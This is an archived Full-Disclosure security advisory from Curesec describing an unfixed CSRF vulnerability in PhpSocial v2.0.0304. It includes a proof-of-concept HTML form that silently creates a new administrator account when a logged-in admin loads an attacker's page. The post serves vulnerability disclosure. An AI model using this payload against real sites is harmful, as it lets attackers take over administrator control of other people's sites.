lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 23 Dec 2015 11:51:19 +0100
From: "Curesec Research Team (CRT)" <>
Subject: [FD] PhpSocial v2.0.0304: CSRF

Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    PhpSocial v2.0.0304_20222226
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Webite:
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  11/21/2015
Disclosed to public: 12/21/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview


Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P


PhpSocial is a social networking software written in PHP. In version v2.0.0304,
it does not have CSRF protection, which means that an attacker can perform
actions for a victim, if the victim visits an attacker controlled site while
logged in.

3. Proof of Concept

Add a new admin:

    <form action="http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/admin/AdminAddViewadmins.php" method="POST">
      <input type="hidden" name="admin_username" value="admin2" />
      <input type="hidden" name="admin_password" value="admin" />
      <input type="hidden" name="admin_password_confirm" value="admin" />
      <input type="hidden" name="admin_name" value="admin2" />
      <input type="hidden" name="admin_email" value="" />
      <input type="hidden" name="task" value="addadmin" />
      <input type="submit" value="Submit request" />

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/21/ Contacted Vendor (no reply)
12/10/ Tried to remind vendor (no email is given, does
2015   not exist, and contact form could not be used because the website is
12/21/ Disclosed to public

Blog Reference:

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists